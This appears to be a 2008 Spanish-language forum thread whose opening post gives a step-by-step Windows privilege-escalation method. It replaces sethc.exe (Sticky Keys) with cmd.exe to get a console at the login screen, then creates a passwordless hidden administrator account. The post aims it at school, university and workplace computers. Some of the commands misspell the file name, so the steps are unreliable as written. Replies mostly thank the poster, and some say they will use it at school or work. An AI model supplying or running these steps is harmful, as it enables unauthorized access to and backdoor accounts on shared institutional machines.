Escalar privilegios Administrador (colegios,U,etc)

Tema en 'Cementerio De Temas' iniciado por sanwolf, 2 Sep 2008.

  1. sanwolf

    sanwolf Usuario Nuevo nvl. 1
    16/41

    Registrado:
    7 Jul 2008
    Mensajes:
    112
    Me Gusta recibidos:
    0
    Te gustaria escalar a privilegios de administrador de tu maquina en recintos como colegios, Universidades y hasta el mismo trabajo, bueno aqui un manual muy educativo Xd.

    Bueno una pequeña introduccion:

    Windows tiene una vulnerabilidad en su sistema que hasta el dia de hoy no es solucionada, se trata de stickykeys, este se activa al pulsar 5 veces la tecla shift.
    Este tipo de ataque se llama, escalada de privilegios, pues te permite obtener acceso como Administrador a un equipo en el cual tenias derechos restringidos
    http://img53.*************/img53/8004/tecladologitechwe0.jpg

    Este es Stickykeys, creo que a mas de alguno le ha salido esta ventanita molestosa mientras estamos jugando o realizando alguna actividad que involucre tipear la tecla shift.
    [​IMG]
    Esta ventanita tambien aparece en el inicio de sesion de windows lo cual aprovecharemos en esta vulnerabilidad
    http://img522.*************/img522/6840/bienvenidastickykeysjf5.jpg

    Bueno ahora realizaremos un pequeño cambio, para que en ves de que aparesca esta molestosa ventanita aparesca el simbolo del sistema[MS-DOS]
    [Queda claro que necesitamos acceso fisico al pc]
    Vamos a inicio->ejecutar y escribimos "cmd" [sin las comillas]
    http://img380.*************/img380/5918/41845640wb9.jpg

    Nos aparecera la siguiente ventanita de MS-DOS
    [​IMG]

    Empezaremos a escribir los comandos

    1-. Escribimos "cd\" [sin comillas] y pulsamos enter
    2-. "cd WINDOWS" [sin comillas] y pulsamos enter
    3-. "cd system32" [sin comillas] y pulsamos enter
    3-. *copy "c:\WINDOWS\system32\setch.exe" "c:\WINDOWS\system32\backup sethc.exe"* [sin los asteriscos *] y pulsamos enter
    4-. *copy "c:\WINDOWS\system32\cmd.exe" "c:\WINDOWS\system32\setch.exe"* [sin los asteriscos *] y pulsamos enter [si nos pide confirmacion ponemos "yes" o "si" dependiendo del SO]
    5-. "exit" [sin comillas] y pulsamos enter

    Bueno ya tenemos no esta la ventana de stickykeys pero si la de MS-DOS [para verificar tipeen 5 veces shift]
    http://img179.*************/img179/4390/sethcexepm9.jpg

    Bueno ahora a escalar privilegio de administrador.
    Reinicien el sistema.
    En la pantalla de bienvenida con las cuentas pulsan 5 veces la tecla shift y aparecera lo anterior

    http://img183.*************/img183/6440/administradorgm9.jpg

    Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:
    "Net user Elusuarioquequieras /add /expires:never /passwordreq:no" [sin comillas]

    Esto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.

    Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:
    "Net localgroup Administradores /add Elusuarioquequieras" [sin comillas]

    Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin

    Protegerse de este fallo

    Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pesta?a teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).
    Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.

    _____________________________________________________________-


     
  2. janod21

    janod21 Usuario Habitual nvl.3 ★
    132/163

    Registrado:
    9 Ago 2007
    Mensajes:
    7.005
    Me Gusta recibidos:
    295
    me dio paja de leer lo por completo pero se supone s que es para realizas acciones con privilegio de adm del pc???
     
  3. PeLiCaN

    PeLiCaN Usuario Habitual nvl.3 ★
    187/244

    Registrado:
    26 Mar 2008
    Mensajes:
    14.624
    Me Gusta recibidos:
    18
    buen dato algun dia lo haré. Se agraedece
     
  4. virox

    virox Usuario Casual nvl. 2
    87/163

    Registrado:
    9 Jul 2007
    Mensajes:
    9.206
    Me Gusta recibidos:
    16
    ams ,

    dale lo provare en mi INStituto : )

    grax
     
  5. EL PROCER

    EL PROCER Usuario Habitual nvl.3 ★
    187/244

    Registrado:
    4 Jul 2007
    Mensajes:
    16.315
    Me Gusta recibidos:
    15
    Se agradece compa
     
  6. di_piterson

    di_piterson Usuario Nuevo nvl. 1
    17/41

    Registrado:
    5 Jun 2008
    Mensajes:
    501
    Me Gusta recibidos:
    1
    yap probando
     
  7. cucarro

    cucarro Usuario Nuevo nvl. 1
    1/41

    Registrado:
    23 Oct 2006
    Mensajes:
    23
    Me Gusta recibidos:
    0
    buenop el datop !
     
  8. kHARU

    kHARU Usuario Casual nvl. 2
    37/41

    Registrado:
    17 Ene 2007
    Mensajes:
    2.261
    Me Gusta recibidos:
    3
    buen dato viejo
     
  9. ncomax

    ncomax Usuario Nuevo nvl. 1
    1/41

    Registrado:
    4 Oct 2008
    Mensajes:
    9
    Me Gusta recibidos:
    0
    si realizo el trabajito y suponiendo que funciona me puede cachar el administrador de la red pa hacerla en la pega jejejej
     
  10. kymani

    kymani Usuario Casual nvl. 2
    37/41

    Registrado:
    16 Jul 2007
    Mensajes:
    3.720
    Me Gusta recibidos:
    2
    quw wenaa compaaa
     
  11. shaknorris

    shaknorris Usuario Casual nvl. 2
    37/41

    Registrado:
    26 Ago 2006
    Mensajes:
    2.917
    Me Gusta recibidos:
    2
    lo trate de hacer pero no pasa nada
     
  12. sebastianandres

    sebastianandres Usuario Nuevo nvl. 1
    16/41

    Registrado:
    21 Oct 2008
    Mensajes:
    177
    Me Gusta recibidos:
    0
    gracias men muy buen dato me gusto mucho
    ya que en la u se puede hacer ya lo probe
    jajajajajjaajajajjajaja
    saludos men

    sebastianandres
    ::portalnet::